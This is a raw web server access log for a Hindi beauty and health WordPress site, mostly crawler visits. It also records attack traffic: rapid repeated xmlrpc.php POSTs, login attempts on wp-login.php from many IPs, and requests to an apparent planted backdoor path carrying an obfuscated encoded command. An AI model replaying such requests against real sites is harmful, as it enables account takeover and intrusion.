193.142.147.5 - - [20/Oct/2025:10:19:36 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
129.150.46.7 - - [20/Oct/2025:10:19:36 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:19:38 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
185.191.171.18 - - [20/Oct/2025:10:19:38 -0400] "GET /tag/household-tests/ HTTP/2.0" 200 149530 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:19:40 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:19:41 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:19:42 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:19:43 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.244.66.235 - - [20/Oct/2025:10:19:42 -0400] "GET /tag/rosewater-to-save-your-hair-skin-and-eyes/ HTTP/2.0" 200 149852 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:19:44 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:19:46 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:19:47 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:19:48 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:19:49 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
85.208.96.197 - - [20/Oct/2025:10:19:48 -0400] "GET /tag/can-you-use-mouthwash-more-than-twice-a-day/ HTTP/2.0" 200 149944 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.244.66.235 - - [20/Oct/2025:10:19:51 -0400] "GET /tag/sabudana-nutrition/ HTTP/2.0" 200 149710 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:19:53 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.249.73.68 - - [20/Oct/2025:10:19:51 -0400] "GET /544657200?entity=0543904594 HTTP/2.0" 200 188684 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:19:54 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:19:57 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
2a03:2880:f800:22:: - - [20/Oct/2025:10:19:56 -0400] "GET /tag/ganesha/ HTTP/2.0" 200 149691 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
193.142.147.5 - - [20/Oct/2025:10:19:58 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:19:59 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
2a03:2880:f800:5:: - - [20/Oct/2025:10:19:58 -0400] "GET /liquid-lipsticks-in-india/11/ HTTP/2.0" 200 311664 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.244.66.235 - - [20/Oct/2025:10:19:59 -0400] "GET /tag/secrets-for-caring-for-teen-skin-tips/ HTTP/2.0" 200 149715 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:20:01 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:03 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:04 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
114.119.141.53 - - [20/Oct/2025:10:20:04 -0400] "GET /8-tips-to-get-rid-of-spectacles-marks/%E0%A4%AF%E0%A4%A6%E0%A4%BF-%E0%A4%86%E0%A4%AA-%E0%A4%AD%E0%A4%BE%E0%A4%B0%E0%A5%80-%E0%A4%94%E0%A4%B0-%E0%A4%9F%E0%A4%BE%E0%A4%87%E0%A4%9F-%E0%A4%9A%E0%A4%B6%E0%A5%8D%E0%A4%AE/ HTTP/2.0" 200 152006 "https://hindi.blushin.com/attachment-sitemap8.xml" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
193.142.147.5 - - [20/Oct/2025:10:20:08 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
185.192.96.207 - - [20/Oct/2025:10:20:08 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:20:08 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.244.66.235 - - [20/Oct/2025:10:20:07 -0400] "GET /tag/skin-tags-removal-tips-in-hindi/ HTTP/2.0" 200 149671 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:20:10 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:11 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:12 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
185.192.96.207 - - [20/Oct/2025:10:20:13 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:20:14 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:15 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
178.33.43.96 - - [20/Oct/2025:10:20:15 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:10:20:15 -0400] "GET /tag/spinach-cooking/ HTTP/2.0" 200 149700 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:20:17 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:18 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.116.199.115 - - [20/Oct/2025:10:17:19 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333433392p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393833392q3866623162306363333965363462346638633931323738306266323431346264222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
193.142.147.5 - - [20/Oct/2025:10:20:19 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
178.33.43.96 - - [20/Oct/2025:10:20:20 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
66.249.73.69 - - [20/Oct/2025:10:20:18 -0400] "GET /50812107?entity=0050742550 HTTP/2.0" 200 190827 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:20:21 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:23 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.244.66.235 - - [20/Oct/2025:10:20:23 -0400] "GET /tag/sunburn-remedies-redness/ HTTP/2.0" 200 149614 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
103.153.42.48 - - [20/Oct/2025:10:20:25 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:20:26 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
103.153.42.48 - - [20/Oct/2025:10:20:28 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:20:28 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:30 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:31 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:32 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.244.66.235 - - [20/Oct/2025:10:20:31 -0400] "GET /tag/ways-to-care-for-curly-hair-in-hindi/ HTTP/2.0" 200 149631 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:20:33 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:34 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
103.109.180.104 - - [20/Oct/2025:10:20:35 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
103.109.180.104 - - [20/Oct/2025:10:20:36 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:20:36 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:37 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:39 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:40 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.116.199.115 - - [20/Oct/2025:10:18:14 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333439342p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393839342q3633616230363163393734336130356166373734323134353264386534323933222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
216.244.66.235 - - [20/Oct/2025:10:20:39 -0400] "GET /tag/what-to-do-if-you-are-anemic/ HTTP/2.0" 200 149630 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:20:42 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
197.250.34.36 - - [20/Oct/2025:10:20:42 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
197.250.34.36 - - [20/Oct/2025:10:20:44 -0400] "POST /wp-login.php HTTP/2.0" 200 7127 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:20:45 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:47 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:48 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:49 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.244.66.235 - - [20/Oct/2025:10:20:48 -0400] "GET /tag/%E0%A4%86%E0%A4%B2%E0%A5%82-%E0%A4%95%E0%A5%87-%E0%A4%9C%E0%A5%82%E0%A4%B8/ HTTP/2.0" 200 149878 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:20:49 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:51 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:53 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:54 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:55 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
193.142.147.5 - - [20/Oct/2025:10:20:57 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
216.244.66.235 - - [20/Oct/2025:10:20:56 -0400] "GET /tag/paneer-malai-kofta-recipe-in-hindi/ HTTP/2.0" 200 149833 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
193.142.147.5 - - [20/Oct/2025:10:20:58 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
85.208.96.210 - - [20/Oct/2025:10:20:57 -0400] "GET /tag/mirror-look-sunglasses/ HTTP/2.0" 200 149479 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
193.142.147.5 - - [20/Oct/2025:10:21:00 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
66.116.199.115 - - [20/Oct/2025:10:18:36 -0400] "GET /wp-admin/js/js/js/index.php?ARRAY=7o2230223n313736303937333531362p2231223n22687474703n5p2s5p2s7n7335363076313373752r646s776973652r6s6r655p2s3s6p633q7068705s636s64655s6n6326743q313736303936393931362q6164626466656332383434633932323037346561366663653538666665373530222p2232223n226435303535656434643363393431613038346662623562313330363063663765222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q33322q35312q36332q37332q38322q3239227q HTTP/2.0" 200 - "-" "-"
52.167.144.169 - - [20/Oct/2025:10:21:01 -0400] "GET /how-to-make-amazing-shampoo-at-home.html/how-to-make-amazing-shampoo-at-home10 HTTP/2.0" 200 194076 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
89.117.74.114 - - [20/Oct/2025:10:21:03 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:21:04 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
89.117.74.114 - - [20/Oct/2025:10:21:04 -0400] "POST /wp-login.php HTTP/2.0" 200 7131 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
216.73.216.143 - - [20/Oct/2025:10:21:05 -0400] "GET /take-care-of-hair-before-going-to-sleep/%e0%a4%a4%e0%a5%87%e0%a4%b2-%e0%a4%b2%e0%a4%97%e0%a4%be%e0%a4%8f%e0%a4%82 HTTP/2.0" 301 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
54.37.96.153 - - [20/Oct/2025:10:21:07 -0400] "GET /wp-login.php HTTP/2.0" 200 6670 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
193.142.147.5 - - [20/Oct/2025:10:21:07 -0400] "POST /xmlrpc.php HTTP/2.0" 200 187 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331"
54.37.96.153 - - [20/Oct/2025:10:21:07 -0400] "POST /wp-login.php HTTP/2.0" 200 7153 "https://hindi.blushin.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
216.244.66.235 - - [20/Oct/2025:10:21:06 -0400] "GET /home-remedies-to-get-rid-of-acidity-and-vomiting-in-kids/ HTTP/2.0" 200 318759 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; [email protected])"
216.73.216.143 - - [20/Oct/2025:10:21:07 -0400] "GET /take-care-of-hair-before-going-to-sleep/%e0%a4%a4%e0%a5%87%e0%a4%b2-%e0%a4%b2%e0%a4%97%e0%a4%be%e0%a4%8f%e0%a4%82/ HTTP/2.0" 200 151359 "https://hindi.blushin.com/take-care-of-hair-before-going-to-sleep/%e0%a4%a4%e0%a5%87%e0%a4%b2-%e0%a4%b2%e0%a4%97%e0%a4%be%e0%a4%8f%e0%a4%82" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
